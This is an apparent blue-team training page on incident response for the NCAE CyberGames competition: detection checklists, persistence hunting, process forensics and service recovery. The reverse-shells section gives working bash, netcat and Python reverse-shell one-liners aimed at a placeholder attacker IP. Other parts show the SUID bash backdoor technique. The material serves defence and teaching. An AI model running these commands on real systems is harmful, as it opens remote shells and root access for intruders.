Incident Response Under Fire

Your system has been compromised. An attacker is on your network. Services are going down. You have minutes, not hours. Incident response (IR) is the process of detecting, containing, and recovering from a security breach — while the attack is still happening.

In NCAE CyberGames, red team operators actively attack your network during the competition. They will compromise services, plant backdoors, change passwords, and try to maintain persistent access. Your job is to find what they’ve done, undo it, and keep your services scoring — all under extreme time pressure.

This page teaches the first-15-minutes checklist, every persistence mechanism attackers use, process forensics, and step-by-step service recovery procedures.

Prerequisites: You should be comfortable with file permissions, process management, and basic shell scripting from earlier lessons.

1. What is Incident Response?

Incident response has four phases:

Phase	Goal	Time
Detection	Discover that something is wrong	Seconds to minutes
Containment	Stop the bleeding — prevent further damage	Minutes
Eradication	Remove the attacker’s access and tools	Minutes to hours
Recovery	Restore services to normal operation	Minutes to hours

In competition, all four phases happen simultaneously. You can’t take the server offline to investigate — services must keep scoring. This means you need a systematic approach: check the most impactful things first, fix them fast, and move on.

The single biggest mistake teams make is chasing the attacker instead of fixing services. The scoring engine doesn’t care whether you caught the red team. It cares whether your services are up. Fix first, hunt second.

2. The First 15 Minutes

The first 15 minutes after discovering a compromise determine the rest of the engagement. Run through this checklist in order. Each item has the exact command to use.

Check 1: Unauthorized SSH keys

Attackers add their public key to authorized_keys files so they can SSH in without a password — even after you change passwords. Check every user’s authorized_keys:

# Check all authorized_keys files on the system
for user_home in /home/* /root; do
    if [ -f "$user_home/.ssh/authorized_keys" ]; then
        echo "=== $user_home ==="
        cat "$user_home/.ssh/authorized_keys"
    fi
done

If you see keys you don’t recognize, remove them:

# Remove all unauthorized keys (keep only yours)
echo "ssh-ed25519 AAAA... your@email" > /home/youruser/.ssh/authorized_keys

Check 2: All crontabs

Cron jobs run on a schedule. Attackers use them to re-establish access, re-open backdoors, or re-download malware:

# Check every user's crontab
for user in $(cut -d: -f1 /etc/passwd); do
    crontab_output=$(crontab -l -u "$user" 2>/dev/null)
    if [ -n "$crontab_output" ]; then
        echo "=== $user ==="
        echo "$crontab_output"
    fi
done

# Check system crontabs
ls -la /etc/cron.d/
cat /etc/crontab
ls -la /etc/cron.daily/ /etc/cron.hourly/

Suspicious signs: cron jobs that download files (wget, curl), run netcat (nc, ncat), or execute scripts from /tmp.

Check 3: New user accounts

Attackers create new accounts for persistent access:

# Show all users with UID >= 1000 (human accounts)
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd

# Show all users with UID 0 (root-equivalent)
awk -F: '$3 == 0 {print $1}' /etc/passwd

If UID 0 shows anything besides root, that’s a backdoor account with full root privileges.

Check 4: SUID binaries

A SUID binary runs with the permissions of its owner, not the user who executes it. If an attacker creates a SUID-root binary, any user can run it and get root access:

# Find SUID binaries outside standard system directories
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'

Legitimate SUID binaries live in /usr/bin, /usr/sbin, /bin, /sbin. Anything in /tmp, /home, /var, or /opt is suspicious.

Check 5: Listening ports

See what’s listening on the network. Unexpected services mean backdoors:

ss -tulnp

Compare against what should be running. If you see something on port 4444, 5555, or any unusual high port — and it’s not one of your services — investigate the process.

Check 6: Running processes

ps aux --forest

The --forest flag shows parent-child relationships, which reveals how processes were spawned. Look for:

Processes running as root that shouldn’t be
Shell processes (/bin/bash, /bin/sh) with no terminal (TTY column shows ?)
Processes with suspicious names or running from /tmp
Netcat (nc, ncat), Python, or Perl processes that look like reverse shells

Check 7: Recently modified files in /etc

find /etc -mmin -60 -type f 2>/dev/null

This shows every file in /etc modified in the last 60 minutes. If the competition just started, any modifications are suspicious. Pay special attention to passwd, shadow, sudoers, and service configs.

Checkpoint: You find an authorized_keys entry you don't recognize, a cron job that runs wget every 5 minutes, and a new user with UID 0. In what order do you fix these?

Priority order based on severity:

UID 0 user — this gives full root access. Remove immediately: userdel -r backdoor_user
authorized_keys — this gives passwordless SSH access. Remove the key now.
Cron job — this will re-infect you. Remove: crontab -r -u affected_user or delete the file from /etc/cron.d/.

The UID 0 account is most dangerous because it’s root-equivalent. The cron job will undo your fixes if you don’t remove it, but the UID 0 account gives immediate unrestricted access.

3. Persistence Mechanisms

Persistence is how attackers maintain access after initial compromise. They assume you’ll eventually change passwords and restart services — so they plant multiple backdoors that survive these actions.

SSH authorized_keys

How it works: Attacker adds their public key to a user’s ~/.ssh/authorized_keys. Now they can SSH in as that user without knowing the password.

Detection:

# Check all authorized_keys files
find / -name "authorized_keys" 2>/dev/null -exec echo "=== {} ===" \; -exec cat {} \;

Removal: Delete unauthorized keys. Verify by comparing against your team’s known public keys.

Cron jobs

How it works: A cron job runs on a schedule (e.g., every 5 minutes) and re-downloads malware, re-opens a reverse shell, or re-adds the attacker’s SSH key.

Detection:

# All user crontabs
for user in $(cut -d: -f1 /etc/passwd); do echo "--- $user ---"; crontab -l -u "$user" 2>/dev/null; done

# System cron directories
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/
cat /etc/crontab

Removal:

crontab -r -u compromised_user    # Remove user's entire crontab
rm /etc/cron.d/suspicious_file    # Remove system cron entry

Systemd services and timers

How it works: Attacker creates a systemd service that starts on boot, or a timer that fires periodically. These survive reboots and are harder to spot than cron jobs.

Detection:

# List all enabled services (look for unfamiliar names)
systemctl list-unit-files --state=enabled

# List all active timers
systemctl list-timers --all

# Check for recently created unit files
find /etc/systemd/system/ /usr/lib/systemd/system/ -mmin -120 -type f 2>/dev/null

Removal:

sudo systemctl stop malicious.service
sudo systemctl disable malicious.service
sudo rm /etc/systemd/system/malicious.service
sudo systemctl daemon-reload

New user accounts

How it works: Attacker creates a new user, sometimes with UID 0 (root-equivalent). Changing the root password doesn’t affect this account.

Detection:

# Users with UID 0 (should only be root)
awk -F: '$3 == 0 {print $1}' /etc/passwd

# Recently created users (high UIDs)
awk -F: '$3 >= 1000 {print $1, $3}' /etc/passwd

# Users with login shells (can SSH in)
grep -v '/nologin\|/false' /etc/passwd

Removal:

sudo userdel -r backdoor_user

SUID binaries

How it works: Attacker copies /bin/bash somewhere and sets the SUID bit. Now any user can run it and get a root shell:

# What the attacker does:
cp /bin/bash /tmp/.hidden_shell
chmod u+s /tmp/.hidden_shell
# Now any user runs: /tmp/.hidden_shell -p  → root shell

Detection:

find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'

Removal:

rm /tmp/.hidden_shell    # Delete the binary entirely
# Or remove just the SUID bit:
chmod u-s /path/to/suspicious_binary

Modified .bashrc / .profile

How it works: Attacker adds a command to a user’s .bashrc or .profile. It runs every time that user logs in or opens a new shell.

Detection:

# Check root's and all users' shell startup files
for user_home in /home/* /root; do
    for rc in .bashrc .profile .bash_profile .bash_login; do
        if [ -f "$user_home/$rc" ]; then
            echo "=== $user_home/$rc ==="
            tail -5 "$user_home/$rc"
        fi
    done
done

Look for lines that run netcat, curl, wget, or execute files from /tmp.

Removal: Edit the file and remove the malicious lines.

Reverse shells

How it works: A reverse shell connects back to the attacker’s machine, giving them a command line. Common variants:

# Bash reverse shell (what the attacker runs on your machine)
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Netcat reverse shell
nc attacker_ip 4444 -e /bin/bash

# Python reverse shell
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Detection:

# Look for processes with network connections to unexpected IPs
ss -tupn | grep ESTAB

# Look for bash/sh/python processes without a terminal
ps aux | grep -E '(bash|sh|python|perl|nc|ncat)' | grep -v grep

Removal: Kill the process:

kill -9 <PID>

Then find and remove whatever restarts it (cron, systemd, .bashrc).

Checkpoint: You kill a reverse shell process, but 5 minutes later it's back. What's restarting it?

Something is persisting the reverse shell. Check in this order:

Cron — crontab -l for all users, check /etc/cron.d/
Systemd timer — systemctl list-timers --all
.bashrc/.profile — Check if the reverse shell command is in a startup file (runs on next login)
Another process — A parent process might be re-spawning it. Check ps aux --forest for parent-child relationships.

The answer is almost always cron. Kill the reverse shell AND remove the cron job.

4. Process Forensics

When you spot a suspicious process, investigate it before killing it. Understanding what it does tells you what else the attacker might have done.

Investigate a running process

# See all processes in a tree (parent-child relationships)
ps aux --forest

Sample output showing a reverse shell:

root      1234  0.0  0.1  12345  6789 ?   Ss   10:00   0:00 /usr/sbin/sshd
root      2345  0.0  0.1  12345  6789 ?   Ss   10:05   0:00  \_ sshd: attacker [priv]
attacker  2346  0.0  0.1  12345  6789 ?   S    10:05   0:00      \_ sshd: attacker@notty
attacker  2347  0.0  0.0   4567  1234 ?   S    10:05   0:00          \_ bash -i
attacker  2400  0.0  0.0   3456   890 ?   S    10:06   0:00              \_ nc 172.16.99.1 4444 -e /bin/bash

This tells the story: someone SSH’d in as “attacker”, opened a bash shell, and started a netcat reverse shell to 172.16.99.1.

Dig deeper with /proc

Every running process has a directory under /proc/<PID>/ containing everything about it:

PID=2400    # The suspicious process

# How was the process started? (full command line)
cat /proc/$PID/cmdline | tr '\0' ' '

# What binary is actually running? (symlink to the executable)
ls -la /proc/$PID/exe

# What files does it have open?
ls -la /proc/$PID/fd/

# What is its working directory?
ls -la /proc/$PID/cwd

# What environment variables does it have?
cat /proc/$PID/environ | tr '\0' '\n'

lsof — List Open Files

lsof shows all resources a process is using: files, sockets, pipes:

# All resources for a specific process
lsof -p 2400

# Just network connections for a process
lsof -i -p 2400

Identifying a reverse shell from ps output

Red flags in ps aux output:

Sign	What it means
`?` in the TTY column	No terminal attached — process is running in background, possibly a daemon or backdoor
`bash -i` or `sh -i`	Interactive shell, suspicious if TTY is `?`
`nc`, `ncat`, `socat` with an IP	Netcat connecting to a remote host — almost certainly a reverse shell
`python -c 'import socket...'`	Python reverse shell one-liner
Process running from `/tmp`	Binaries in /tmp are always suspicious
Unknown username	Account you didn’t create

The forensics workflow

Spot it: ps aux --forest and ss -tupn
Investigate it: /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p <PID>
Record it: Write down the PID, command, user, connections (for your team’s notes)
Kill it: kill -9 <PID>
Find persistence: What restarts this process? Check cron, systemd, .bashrc
Remove persistence: Delete the mechanism that relaunches it

Checkpoint: ps shows a process running as root with command "/tmp/.x" and no terminal. /proc/PID/exe points to /tmp/.x. What are your next steps?

Check what it is: file /tmp/.x — is it a compiled binary, a script, or a known shell?
Check connections: lsof -i -p <PID> — is it connecting to an external IP?
Check /proc/PID/fd: What files does it have open?
Kill it: kill -9 <PID>
Remove the binary: rm /tmp/.x
Find persistence: How did it start? Check cron, systemd timers, .bashrc, and look for a parent process in ps aux --forest.
Check for more: Attacker may have planted similar binaries elsewhere. Run find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null.

5. Service Recovery Drill

When red team breaks your services, you need to restore them fast. Here are step-by-step recovery procedures for the three most critical services.

SSH Recovery

# Step 1: Check if sshd is running
systemctl status sshd

# Step 2: Restore config from backup (if you made one)
sudo cp /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
# Or restore critical settings manually:
sudo sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sudo sed -i 's/^PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config

# Step 3: Fix permissions (sshd is strict about these)
sudo chmod 644 /etc/ssh/sshd_config
sudo chmod 600 /etc/ssh/ssh_host_*_key
sudo chmod 644 /etc/ssh/ssh_host_*_key.pub

# Step 4: Test config syntax
sudo sshd -t

# Step 5: Restart
sudo systemctl restart sshd

# Step 6: Verify
ssh localhost
ss -tulnp | grep :22

PostgreSQL Recovery

# Step 1: Check if PostgreSQL is running
systemctl status postgresql

# Step 2: Restore pg_hba.conf (authentication config)
# This file controls who can connect and how they authenticate
sudo cp /var/lib/pgsql/data/pg_hba.conf.bak /var/lib/pgsql/data/pg_hba.conf
# Or fix manually --- this allows local and network password auth:
# local  all  all                 md5
# host   all  all  10.0.5.0/24   md5

# Step 3: Fix ownership and permissions
sudo chown postgres:postgres /var/lib/pgsql/data/pg_hba.conf
sudo chmod 640 /var/lib/pgsql/data/pg_hba.conf

# Step 4: Restart
sudo systemctl restart postgresql

# Step 5: Verify (test a connection)
psql -h localhost -U postgres -c "SELECT 1;"
ss -tulnp | grep :5432

DNS Recovery

# Step 1: Check if named is running
systemctl status named

# Step 2: Restore named.conf from backup
sudo cp /etc/named.conf.bak /etc/named.conf

# Step 3: Restore zone files from backup
sudo cp /var/named/team5.cyber.local.zone.bak /var/named/team5.cyber.local.zone

# Step 4: Validate both configs
named-checkconf
named-checkzone team5.cyber.local /var/named/team5.cyber.local.zone

# Step 5: Fix ownership
sudo chown named:named /var/named/team5.cyber.local.zone

# Step 6: Restart
sudo systemctl restart named

# Step 7: Verify
dig @localhost team5.cyber.local
ss -tulnp | grep :53

The backup lesson

Every recovery procedure above starts with “restore from backup.” Make backups in the first 5 minutes of competition, before red team touches anything:

# Run this FIRST THING in competition
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo cp /etc/named.conf /etc/named.conf.bak
sudo cp /var/named/team5.cyber.local.zone /var/named/team5.cyber.local.zone.bak
sudo cp /var/lib/pgsql/data/pg_hba.conf /var/lib/pgsql/data/pg_hba.conf.bak

6. The IR Script

This script automates the first-15-minutes checklist. Save it, make it executable, and run it the moment you suspect a compromise:

#!/usr/bin/env bash
# ir-check.sh — First-15-minutes incident response checklist
# Usage: sudo ./ir-check.sh

set -euo pipefail

echo "=========================================="
echo "  INCIDENT RESPONSE CHECKLIST"
echo "  $(date)"
echo "=========================================="

echo ""
echo "[1] AUTHORIZED_KEYS FILES"
echo "---"
for home in /home/* /root; do
    [ -f "$home/.ssh/authorized_keys" ] && echo "$home:" && cat "$home/.ssh/authorized_keys"
done

echo ""
echo "[2] CRONTABS (all users)"
echo "---"
for user in $(cut -d: -f1 /etc/passwd); do
    output=$(crontab -l -u "$user" 2>/dev/null) && echo "$user: $output"
done
echo "System cron.d:"
ls -la /etc/cron.d/ 2>/dev/null

echo ""
echo "[3] USERS WITH UID 0 (root-equivalent)"
echo "---"
awk -F: '$3 == 0 {print $1}' /etc/passwd

echo ""
echo "[4] USERS WITH UID >= 1000"
echo "---"
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd

echo ""
echo "[5] SUID BINARIES (non-standard paths)"
echo "---"
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/' || echo "(none found)"

echo ""
echo "[6] LISTENING PORTS"
echo "---"
ss -tulnp

echo ""
echo "[7] PROCESS TREE"
echo "---"
ps aux --forest

echo ""
echo "[8] RECENTLY MODIFIED FILES IN /etc (last 60 min)"
echo "---"
find /etc -mmin -60 -type f 2>/dev/null || echo "(none found)"

echo ""
echo "[9] ESTABLISHED CONNECTIONS"
echo "---"
ss -tupn | grep ESTAB

echo ""
echo "[10] ACTIVE SYSTEMD TIMERS"
echo "---"
systemctl list-timers --all --no-pager 2>/dev/null

echo ""
echo "=========================================="
echo "  CHECKLIST COMPLETE — Review output above"
echo "=========================================="

Make it executable and run it:

chmod +x ir-check.sh
sudo ./ir-check.sh | tee ir-report-$(date +%H%M).txt

The tee command saves the output to a timestamped file while also displaying it on screen. Run this multiple times during competition to track changes.

7. Triage Under Time Pressure

When multiple things are broken and red team is still active, you need a decision framework. Not everything is equally important.

Service priority by scoring weight

Priority	Service	Weight	Fix first?
1	SMB Login	3x	Always first
2	SSH	2x	Second
3	DNS	2x	Second (tied with SSH)
4	Web, FTP, etc.	1x	After high-weight services

The triage loop

Run ir-check.sh (2 minutes)
Fix highest-weight broken service (3-5 minutes)
Remove persistence mechanisms found in step 1 (2-3 minutes)
Verify services are scoring (1 minute)
Go back to step 1

What NOT to do

Bad move	Why it fails
Chasing red team through logs	You lose points while services are down
Rebooting the server	Kills all active sessions — including yours
Changing all passwords at once	You lose access before setting up alternatives
Installing new software during competition	Wastes time and may break dependencies
Panicking and making random changes	Unclear state makes debugging impossible

What TO do

Good move	Why it works
Fix services before hunting	Points accumulate while you investigate
Use your backup configs	30-second restore vs 10-minute debugging
Run ir-check.sh after every fix	Catches re-infection immediately
Divide work across team members	One person fixes services, another hunts persistence
Document what you find	Build a timeline so you can predict what red team will do next

Checkpoint: SMB is down (3x weight), SSH is compromised (someone changed the root password), and you found a cron-based reverse shell. You have one person. What do you fix first?

SMB first. It’s worth 3x. Get it scoring by following the quick recovery procedure from the SMB lesson. Then kill the reverse shell and remove the cron job (takes 30 seconds). Then deal with SSH — change the root password back, verify sshd_config, restart. The reverse shell is dangerous, but if you fix SMB and then immediately kill the shell, you’ve minimized both point loss and attacker access.

Exercises

IR Drill: Set up a practice VM with three backdoors: an authorized_keys entry, a cron job reverse shell, and a SUID bash in /tmp. Run ir-check.sh and identify all three. Remove them in under 5 minutes.
Process Forensics Lab: Start a fake reverse shell on a practice VM (ncat -e /bin/bash your_ip 4444). From a second terminal, use ps aux --forest, /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p, and ss -tupn to fully investigate it. Write a one-paragraph forensics report.
Service Recovery Race: Set up SSH, Samba, and DNS on a practice VM. Have a partner break one service (stop it, corrupt the config, change a password). Time yourself restoring it using only the recovery procedures in this lesson. Target: under 3 minutes.
Persistence Gauntlet: Have a partner plant 5 persistence mechanisms on a practice VM (one from each category: authorized_keys, cron, systemd service, new user, SUID binary). Find and remove all 5 in under 10 minutes.

Resources

Practice: BlueTeamLabs Online (incident response challenges) · CyberDefenders (forensics and IR)

Reference: NIST Incident Response Guide (SP 800-61) · SANS Incident Handler’s Handbook

Video: John Hammond — IR and forensics · NCAE CyberGames competition walkthroughs